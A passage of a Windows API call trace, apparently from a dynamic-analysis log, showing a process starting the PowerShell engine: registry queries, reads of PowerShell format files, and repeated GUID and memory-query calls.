	[0225.113] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.113] RegCloseKey (hKey=0x35c) returned 0x0
	[0225.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.113] GetLastError () returned 0x0
	[0225.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.113] GetLastError () returned 0x0
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x279eb091, Data2=0xbb46, Data3=0x40eb, Data4=([0]=0x83, [1]=0x5d, [2]=0x1b, [3]=0x75, [4]=0x43, [5]=0x8a, [6]=0x2f, [7]=0x90))) returned 0x0
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x2c890525, Data2=0xb279, Data3=0x43d5, Data4=([0]=0x81, [1]=0x24, [2]=0xf6, [3]=0x41, [4]=0x81, [5]=0x96, [6]=0xcd, [7]=0x88))) returned 0x0
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x843958ba, Data2=0x575b, Data3=0x4018, Data4=([0]=0x90, [1]=0x31, [2]=0xfa, [3]=0xa7, [4]=0xc0, [5]=0x4c, [6]=0xe1, [7]=0x1c))) returned 0x0
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x3e9d973, Data2=0xa831, Data3=0x4872, Data4=([0]=0x92, [1]=0xf0, [2]=0x62, [3]=0xe9, [4]=0x45, [5]=0xd1, [6]=0xcd, [7]=0x77))) returned 0x0
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x8549b00b, Data2=0xbc34, Data3=0x4352, Data4=([0]=0x91, [1]=0xda, [2]=0x40, [3]=0x46, [4]=0x1b, [5]=0xd4, [6]=0x97, [7]=0x3))) returned 0x0
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x4be9a177, Data2=0xf5fd, Data3=0x4b10, Data4=([0]=0x82, [1]=0x33, [2]=0x69, [3]=0xa5, [4]=0xbc, [5]=0x4d, [6]=0x9d, [7]=0xd1))) returned 0x0
	[0225.114] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.114] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x806c0e83, Data2=0xb344, Data3=0x4f8f, Data4=([0]=0x89, [1]=0x84, [2]=0x16, [3]=0x8, [4]=0x1c, [5]=0x17, [6]=0x71, [7]=0x27))) returned 0x0
	[0225.114] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.115] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.115] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xdaeb4dd3, Data2=0xd3bf, Data3=0x4d91, Data4=([0]=0x9c, [1]=0x3a, [2]=0x4f, [3]=0x4, [4]=0x74, [5]=0x8c, [6]=0x4, [7]=0xe6))) returned 0x0
	[0225.115] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc8452953, Data2=0x21c8, Data3=0x4234, Data4=([0]=0x85, [1]=0x4a, [2]=0x6f, [3]=0x2a, [4]=0x89, [5]=0x2d, [6]=0xcb, [7]=0x7d))) returned 0x0
	[0225.115] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd813d044, Data2=0xbd55, Data3=0x4f55, Data4=([0]=0x88, [1]=0xb5, [2]=0x92, [3]=0x7e, [4]=0xc0, [5]=0xb2, [6]=0x30, [7]=0x68))) returned 0x0
	[0225.115] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x6a366b8a, Data2=0x736c, Data3=0x4ac2, Data4=([0]=0x95, [1]=0x70, [2]=0x99, [3]=0x22, [4]=0x8c, [5]=0x7, [6]=0x50, [7]=0xd4))) returned 0x0
	[0225.115] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.115] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x11b50ef8, Data2=0x7047, Data3=0x4974, Data4=([0]=0xb9, [1]=0x7b, [2]=0x58, [3]=0x2f, [4]=0x97, [5]=0x37, [6]=0xd6, [7]=0x5e))) returned 0x0
	[0225.115] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.115] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.116] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.116] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.116] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.116] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe6f4d34f, Data2=0xea8f, Data3=0x464a, Data4=([0]=0xa9, [1]=0xe, [2]=0x8b, [3]=0x33, [4]=0xfa, [5]=0xc1, [6]=0xd0, [7]=0xf8))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x379cdfbc, Data2=0xdf72, Data3=0x4bc3, Data4=([0]=0xa9, [1]=0xdd, [2]=0x58, [3]=0x96, [4]=0xef, [5]=0x83, [6]=0xd1, [7]=0xc0))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x409f88d8, Data2=0x9aa, Data3=0x4eb0, Data4=([0]=0x8a, [1]=0x7a, [2]=0x6f, [3]=0x1c, [4]=0xe9, [5]=0xa8, [6]=0x7e, [7]=0x55))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xa60c166e, Data2=0xea7b, Data3=0x4a2b, Data4=([0]=0xa8, [1]=0x4e, [2]=0xd8, [3]=0xcf, [4]=0x87, [5]=0x95, [6]=0xd1, [7]=0xe5))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xeeff6c39, Data2=0xafd, Data3=0x4b68, Data4=([0]=0xa4, [1]=0x8b, [2]=0xcd, [3]=0xdf, [4]=0xe7, [5]=0xfd, [6]=0x95, [7]=0xe0))) returned 0x0
	[0225.117] VirtualQuery (in: lpAddress=0x10d8b4, lpBuffer=0x10e8b4, dwLength=0x1c | out: lpBuffer=0x10e8b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe9f9a98, Data2=0x8fcf, Data3=0x496d, Data4=([0]=0x9d, [1]=0xfd, [2]=0x8, [3]=0xd0, [4]=0xff, [5]=0x73, [6]=0x3a, [7]=0x9c))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x11172e0d, Data2=0x356e, Data3=0x4e91, Data4=([0]=0x8c, [1]=0xb4, [2]=0xee, [3]=0x20, [4]=0x22, [5]=0x0, [6]=0xa0, [7]=0x79))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x82bb5714, Data2=0x937f, Data3=0x4a2e, Data4=([0]=0x80, [1]=0x6d, [2]=0x70, [3]=0x86, [4]=0x7b, [5]=0x7a, [6]=0x8, [7]=0xd1))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x942f52ee, Data2=0x2f8, Data3=0x473c, Data4=([0]=0x9f, [1]=0x9e, [2]=0x57, [3]=0x41, [4]=0x5b, [5]=0x7b, [6]=0x40, [7]=0x33))) returned 0x0
	[0225.117] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x730d02c8, Data2=0xdee8, Data3=0x4458, Data4=([0]=0x85, [1]=0x8, [2]=0x3d, [3]=0x14, [4]=0xf3, [5]=0x45, [6]=0x68, [7]=0xe0))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x2ad08602, Data2=0x9f3e, Data3=0x44ff, Data4=([0]=0x9f, [1]=0x9, [2]=0x2d, [3]=0x0, [4]=0x9f, [5]=0xc7, [6]=0xa0, [7]=0x76))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xa4dd8396, Data2=0x6d79, Data3=0x4461, Data4=([0]=0xa8, [1]=0x52, [2]=0x2b, [3]=0x94, [4]=0x20, [5]=0x1b, [6]=0x94, [7]=0x84))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x932e2936, Data2=0x7df1, Data3=0x43f7, Data4=([0]=0x9e, [1]=0x6c, [2]=0x75, [3]=0x17, [4]=0x0, [5]=0xd1, [6]=0x92, [7]=0xcf))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb525a4c1, Data2=0x9cde, Data3=0x415e, Data4=([0]=0xad, [1]=0xf0, [2]=0xb0, [3]=0xd7, [4]=0x1, [5]=0x44, [6]=0x35, [7]=0xc1))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xdb374bb2, Data2=0xf4c4, Data3=0x47fe, Data4=([0]=0xbd, [1]=0x46, [2]=0x8e, [3]=0x2a, [4]=0xe4, [5]=0x25, [6]=0x93, [7]=0xe0))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xecde092c, Data2=0xdacd, Data3=0x42d7, Data4=([0]=0x96, [1]=0xf5, [2]=0xfd, [3]=0xa9, [4]=0x9a, [5]=0xb3, [6]=0x7b, [7]=0x1b))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe6336e5f, Data2=0x5991, Data3=0x4134, Data4=([0]=0x82, [1]=0x8c, [2]=0x6c, [3]=0x5c, [4]=0x82, [5]=0x89, [6]=0xb, [7]=0x2a))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x6506438a, Data2=0x7504, Data3=0x4182, Data4=([0]=0xab, [1]=0x3b, [2]=0xc2, [3]=0xa6, [4]=0xd9, [5]=0xe5, [6]=0x3f, [7]=0x13))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc34bb3cb, Data2=0x492d, Data3=0x403c, Data4=([0]=0xb2, [1]=0x7b, [2]=0xe8, [3]=0xca, [4]=0x84, [5]=0xfd, [6]=0xf9, [7]=0xb0))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x657e27ae, Data2=0x858a, Data3=0x432e, Data4=([0]=0xa4, [1]=0xa9, [2]=0x1c, [3]=0x4d, [4]=0x9f, [5]=0xd7, [6]=0xf4, [7]=0x51))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xa3aa45f6, Data2=0x54ec, Data3=0x4df3, Data4=([0]=0x98, [1]=0xc, [2]=0xae, [3]=0x82, [4]=0x72, [5]=0xad, [6]=0x2f, [7]=0x62))) returned 0x0
	[0225.118] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc5492b3, Data2=0x21fa, Data3=0x4b19, Data4=([0]=0x87, [1]=0xe4, [2]=0xbc, [3]=0x2, [4]=0x45, [5]=0xe0, [6]=0x4e, [7]=0x4e))) returned 0x0
	[0225.119] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x3123d9bc, Data2=0x208c, Data3=0x4c5b, Data4=([0]=0xbf, [1]=0xf3, [2]=0x9c, [3]=0x32, [4]=0x1d, [5]=0xb8, [6]=0xea, [7]=0xf1))) returned 0x0
	[0225.119] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc319d185, Data2=0x1410, Data3=0x423e, Data4=([0]=0xa2, [1]=0x75, [2]=0x4c, [3]=0xbd, [4]=0x3, [5]=0x38, [6]=0xf3, [7]=0x1f))) returned 0x0
	[0225.119] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.119] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.121] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.123] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x6d8a22c8, Data2=0xdcce, Data3=0x44fb, Data4=([0]=0xa5, [1]=0x1e, [2]=0xde, [3]=0xdf, [4]=0x4d, [5]=0xe6, [6]=0x19, [7]=0xd4))) returned 0x0
	[0225.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.123] GetLastError () returned 0x0
	[0225.123] SetErrorMode (uMode=0x1) returned 0x1
	[0225.123] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c
	[0225.123] GetLastError () returned 0x0
	[0225.123] GetFileType (hFile=0x35c) returned 0x1
	[0225.123] SetErrorMode (uMode=0x1) returned 0x1
	[0225.123] GetFileType (hFile=0x35c) returned 0x1
	[0225.123] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.124] GetLastError () returned 0x0
	[0225.124] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.124] GetLastError () returned 0x0
	[0225.124] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.124] GetLastError () returned 0x0
	[0225.125] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.125] GetLastError () returned 0x0
	[0225.125] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.125] GetLastError () returned 0x0
	[0225.125] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.125] GetLastError () returned 0x0
	[0225.125] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x119, lpOverlapped=0x0) returned 1
	[0225.125] GetLastError () returned 0x0
	[0225.125] ReadFile (in: hFile=0x35c, lpBuffer=0x2d8f748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d8f748*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.125] GetLastError () returned 0x0
	[0225.125] CloseHandle (hObject=0x35c) returned 1
	[0225.127] GetLastError () returned 0x0
	[0225.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.127] GetLastError () returned 0x0
	[0225.127] SetErrorMode (uMode=0x1) returned 0x1
	[0225.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2db0744 | out: lpFileInformation=0x2db0744*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0225.127] GetLastError () returned 0x0
	[0225.127] SetErrorMode (uMode=0x1) returned 0x1
	[0225.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.127] GetLastError () returned 0x0
	[0225.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x35c) returned 0x0
	[0225.128] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.128] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.128] RegCloseKey (hKey=0x35c) returned 0x0
	[0225.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.128] GetLastError () returned 0x0
	[0225.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0225.128] GetLastError () returned 0x0
	[0225.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.128] GetLastError () returned 0x0
	[0225.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.129] GetLastError () returned 0x0
	[0225.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.129] GetLastError () returned 0x0
	[0225.130] VirtualQuery (in: lpAddress=0x10d710, lpBuffer=0x10e710, dwLength=0x1c | out: lpBuffer=0x10e710*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.130] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xbc0508b5, Data2=0x81a6, Data3=0x4ff5, Data4=([0]=0x86, [1]=0x49, [2]=0xa5, [3]=0x4f, [4]=0xd9, [5]=0xbc, [6]=0x36, [7]=0x80))) returned 0x0
	[0225.130] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.130] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x37a6e809, Data2=0x2126, Data3=0x44a4, Data4=([0]=0xb9, [1]=0xf8, [2]=0x3c, [3]=0x13, [4]=0xff, [5]=0x77, [6]=0xfd, [7]=0xc7))) returned 0x0
	[0225.130] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x467fd80e, Data2=0xa5b9, Data3=0x4217, Data4=([0]=0xa5, [1]=0x4b, [2]=0xd7, [3]=0xcc, [4]=0x10, [5]=0xbb, [6]=0x7c, [7]=0x2b))) returned 0x0
	[0225.130] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe1db28f1, Data2=0xc38, Data3=0x4369, Data4=([0]=0xb5, [1]=0xf2, [2]=0x8a, [3]=0xf2, [4]=0x89, [5]=0x5e, [6]=0xb3, [7]=0x40))) returned 0x0
	[0225.130] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.131] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.131] GetLastError () returned 0x0
	[0225.131] SetErrorMode (uMode=0x1) returned 0x1
	[0225.131] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c
	[0225.131] GetLastError () returned 0x0
	[0225.131] GetFileType (hFile=0x35c) returned 0x1
	[0225.131] SetErrorMode (uMode=0x1) returned 0x1
	[0225.131] GetFileType (hFile=0x35c) returned 0x1
	[0225.131] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.132] GetLastError () returned 0x0
	[0225.132] ReadFile (in: hFile=0x35c, lpBuffer=0x2dd976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dd976c*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.132] GetLastError () returned 0x0
